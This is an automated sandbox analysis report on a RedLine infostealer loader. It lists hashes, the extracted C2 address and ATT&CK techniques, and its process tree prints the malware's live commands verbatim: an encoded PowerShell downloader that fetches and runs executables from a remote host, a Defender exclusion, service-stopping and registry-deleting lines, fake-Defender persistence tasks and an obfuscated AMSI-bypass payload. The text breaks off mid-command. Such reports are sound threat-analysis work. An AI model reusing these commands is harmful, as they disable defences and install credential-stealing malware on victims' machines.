redline | 3c9481224a7c8ba107be9850b1cb62159867a780c1afcf75bb4a47bdbf042bc2

Analysis

max time kernel
135s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
07-11-2022 17:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

C4Loader.exe
Size

126KB
MD5

fe189d6f17ac70da642777a955b699cc
SHA1

6dd9ab32e1bcc97bacee5d55498d78478e28a489
SHA256

3c9481224a7c8ba107be9850b1cb62159867a780c1afcf75bb4a47bdbf042bc2
SHA512

20379862c6253ade42ba5d5cc6fe6c40d4a15d85fe48514670381199a5aaf5c705a640e0749f4c00f38b58b909b33a02ccca338bc81a7b080e078b6bb8a2cb9f
SSDEEP

3072:vbQwc8GhRcGlcxE7Gi5NPf5uE5E6fRyF3HfPbGmX2w3KyPzapXc:vbJsFl26f5s6f+G63KyPz+Xc

Score

10^/10

redline 1 evasion infostealer

Malware Config

Extracted

Family

redline

Botnet

107.182.129.73:21733

Attributes

auth_value
3a5bb0917495b4312d052a0b8977d2bb

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4840-168-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/2684-173-0x0000000000150000-0x000000000018E000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

SmartDefRun.exe

description pid process target process

PID 3388 created 3092 3388 SmartDefRun.exe Explorer.EXE
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

27 4972 powershell.exe
30 4972 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

new2.exeSysApp.exeSmartDefRun.exe

pid process

2684 new2.exe
4344 SysApp.exe
3388 SmartDefRun.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 2 IoCs

Processes:

C4Loader.exenew2.exe

description pid process target process

PID 4752 set thread context of 640 4752 C4Loader.exe vbc.exe
PID 2684 set thread context of 4840 2684 new2.exe vbc.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1104 sc.exe
3900 sc.exe
820 sc.exe
1468 sc.exe
1256 sc.exe
940 sc.exe
1420 sc.exe
4284 sc.exe
4848 sc.exe
3208 sc.exe
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

540 4752 WerFault.exe C4Loader.exe

description	pid	process	target process
PID 3388 created 3092	3388	SmartDefRun.exe	Explorer.EXE

flow	pid	process
27	4972	powershell.exe
30	4972	powershell.exe

pid	process
2684	new2.exe
4344	SysApp.exe
3388	SmartDefRun.exe

description	pid	process	target process
PID 4752 set thread context of 640	4752	C4Loader.exe	vbc.exe
PID 2684 set thread context of 4840	2684	new2.exe	vbc.exe

pid	process
1104	sc.exe
3900	sc.exe
820	sc.exe
1468	sc.exe
1256	sc.exe
940	sc.exe
1420	sc.exe
4284	sc.exe
4848	sc.exe
3208	sc.exe

pid	pid_target	process	target process
540	4752	WerFault.exe	C4Loader.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

powershell.exeSmartDefRun.exepowershell.exeSysApp.exe

pid	process
4972	powershell.exe
4972	powershell.exe
3388	SmartDefRun.exe
3388	SmartDefRun.exe
2416	powershell.exe
2416	powershell.exe
4344	SysApp.exe
4344	SysApp.exe
4344	SysApp.exe
4344	SysApp.exe
4344	SysApp.exe
4344	SysApp.exe
4344	SysApp.exe
4344	SysApp.exe
4344	SysApp.exe
4344	SysApp.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4972 powershell.exe
Token: SeDebugPrivilege 2416 powershell.exe

description	pid	process
Token: SeDebugPrivilege	4972	powershell.exe
Token: SeDebugPrivilege	2416	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

C4Loader.exevbc.exepowershell.exenew2.exe

description	pid	process	target process
PID 4752 wrote to memory of 640	4752	C4Loader.exe	vbc.exe
PID 4752 wrote to memory of 640	4752	C4Loader.exe	vbc.exe
PID 4752 wrote to memory of 640	4752	C4Loader.exe	vbc.exe
PID 4752 wrote to memory of 640	4752	C4Loader.exe	vbc.exe
PID 4752 wrote to memory of 640	4752	C4Loader.exe	vbc.exe
PID 640 wrote to memory of 4972	640	vbc.exe	powershell.exe
PID 640 wrote to memory of 4972	640	vbc.exe	powershell.exe
PID 640 wrote to memory of 4972	640	vbc.exe	powershell.exe
PID 4972 wrote to memory of 2684	4972	powershell.exe	new2.exe
PID 4972 wrote to memory of 2684	4972	powershell.exe	new2.exe
PID 4972 wrote to memory of 2684	4972	powershell.exe	new2.exe
PID 4972 wrote to memory of 4344	4972	powershell.exe	SysApp.exe
PID 4972 wrote to memory of 4344	4972	powershell.exe	SysApp.exe
PID 4972 wrote to memory of 4344	4972	powershell.exe	SysApp.exe
PID 4972 wrote to memory of 3388	4972	powershell.exe	SmartDefRun.exe
PID 4972 wrote to memory of 3388	4972	powershell.exe	SmartDefRun.exe
PID 2684 wrote to memory of 4840	2684	new2.exe	vbc.exe
PID 2684 wrote to memory of 4840	2684	new2.exe	vbc.exe
PID 2684 wrote to memory of 4840	2684	new2.exe	vbc.exe
PID 2684 wrote to memory of 4840	2684	new2.exe	vbc.exe
PID 2684 wrote to memory of 4840	2684	new2.exe	vbc.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3092

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4752

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcgBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBiAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBlAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAZQB0AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHkAagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGcAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAZQB0AHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGQAZABuAHMALgBuAGUAdAAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAG4AZQB3ADIALgBlAHgAZQAnACwAIAA8ACMAcgBiAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHAAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGUAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBuAGUAdwAyAC4AZQB4AGUAJwApACkAPAAjAGYAaAB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBsAHAAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcwBjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbQB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAG4AdABrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAegB6AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AGgAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHgAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcQB4AHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagB0AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAYwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQA8ACMAaABxAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBnAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAawB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAGsAcgBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbQByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAZgBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABmAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAaQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQA8ACMAYgBwAHMAIwA+AA=="
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4972

C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2684

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
6⤵
PID:4840

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4344

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
6⤵
PID:1856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 252
3⤵
- Program crash
PID:540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:3604

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1468

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:4848

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:3208

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:940

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:2896

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1420

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1448

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:2752

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:2524

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:1876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#waqsnj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsDefenderSmartScreenQC" } Else { "C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe" }
2⤵
PID:4968

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn WindowsDefenderSmartScreenQC
3⤵
PID:4764

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:4684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
PID:1340

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:4164

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1256

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1104

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:3900

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:820

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1776

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:520

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4284

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:1556

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:3268

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
2⤵
PID:3704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4752 -ip 4752
1⤵
PID:4280

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:QTbKBmbRkUkJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wkwZuxuNccfUsW,[Parameter(Position=1)][Type]$UPxtrrZaFK)$QKwDjPxiboc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+'o'+[Char](100)+''+'u'+'le',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+'egat'+[Char](101)+''+[Char](84)+'yp'+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+'l'+[Char](105)+''+[Char](99)+',Se'+'a'+''+'l'+''+'e'+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+'C'+''+'l'+'a'+[Char](115)+''+'s'+','+'A'+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s',[MulticastDelegate]);$QKwDjPxiboc.DefineConstructor('RTS'+[Char](112)+''+'e'+'c'+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+[Char](72)+'i'+'d'+''+[Char](101)+'By'+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wkwZuxuNccfUsW).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+'i'+[Char](109)+'e,'+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+'d');$QKwDjPxiboc.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+'o'+'k'+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+','+[Char](78)+'e'+'w'+''+'S'+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+'l'+'',$UPxtrrZaFK,$wkwZuxuNccfUsW).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+'i'+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+'d');Write-Output $QKwDjPxiboc.CreateType();}$NcnJyaDBAJPBL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'te'+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'icro'+'s'+''+[Char](111)+'f'+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n3'+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+[Char](78)+''+'c'+''+'n'+''+[Char](74)+'y'+[Char](97)+''+'D'+''+[Char](66)+''+[Char](65)+''+[Char](74)+''+[Char](80)+''+'B'+''+'L'+'');$kGzgqZeLdlcjRG=$NcnJyaDBAJPBL.GetMethod(''+[Char](107)+''+'G'+''+'z'+'g'+'q'+''+[Char](90)+''+'e'+''+[Char](76)+''+'d'+''+[Char](108)+''+'c'+''+[Char](106)+''+'R'+''+'G'+'',[Reflection.BindingFlags]''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+'t'+'a'+''+[Char](116)+'ic',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZiSPLsnNkDXRbsXdOEP=QTbKBmbRkUkJ @([String])([IntPtr]);$WacSygbllfnyDBVYfZLyOp=QTbKBmbRkUkJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JhzBElgIBjR=$NcnJyaDBAJPBL.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+''+'.'+'d'+[Char](108)+''+'l'+'')));$gxNJnxAgdXMBmJ=$kGzgqZeLdlcjRG.Invoke($Null,@([Object]$JhzBElgIBjR,[Object]('L'+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+'br'+[Char](97)+'r'+'y'+''+'A'+'')));$oOYkMjoGPQGPqUoFK=$kGzgqZeLdlcjRG.Invoke($Null,@([Object]$JhzBElgIBjR,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$THXhpEo=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gxNJnxAgdXMBmJ,$ZiSPLsnNkDXRbsXdOEP).Invoke(''+'a'+''+'m'+'si'+[Char](46)+''+'d'+''+'l'+'l');$jRzMdfBQLoDIPDGaH=$kGzgqZeLdlcjRG.Invoke($Null,@([Object]$THXhpEo,[Object](''+[Char](65)+''+'m'+'s'+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+'n'+'B'+''+'u'+''+[Char](102)+'f'+'e'+''+[Char](114)+'')));$wEloZHfGxT=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oOYkMjoGPQGPqUoFK,$WacSygbllfnyDBVYfZLyOp).Invoke($jRzMdfBQLoDIPDGaH,[uint32]8,4,[ref]$wEloZHfGxT);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$jRzMdfBQLoDIPDGaH,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oOYkMjoGPQGPqUoFK,$WacSygbllfnyDBVYfZLyOp).Invoke($jRzMdfBQLoDIPDGaH,[uint32]8,0x20,[ref]$wEloZHfGxT);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'TW'+'A'+'R'+'E'+'').GetValue('d'+[Char](105)+'a'+[Char](108)+''+[Char](101)+''+[Char](114)+''+[Char](115)+'ta'+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
1⤵
PID:1000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YnxyzZBzoApQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QbHtJrODohwPbN,[Parameter(Position=1)][Type]$ZyNGoKdKac)$qezYBtiCZKu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 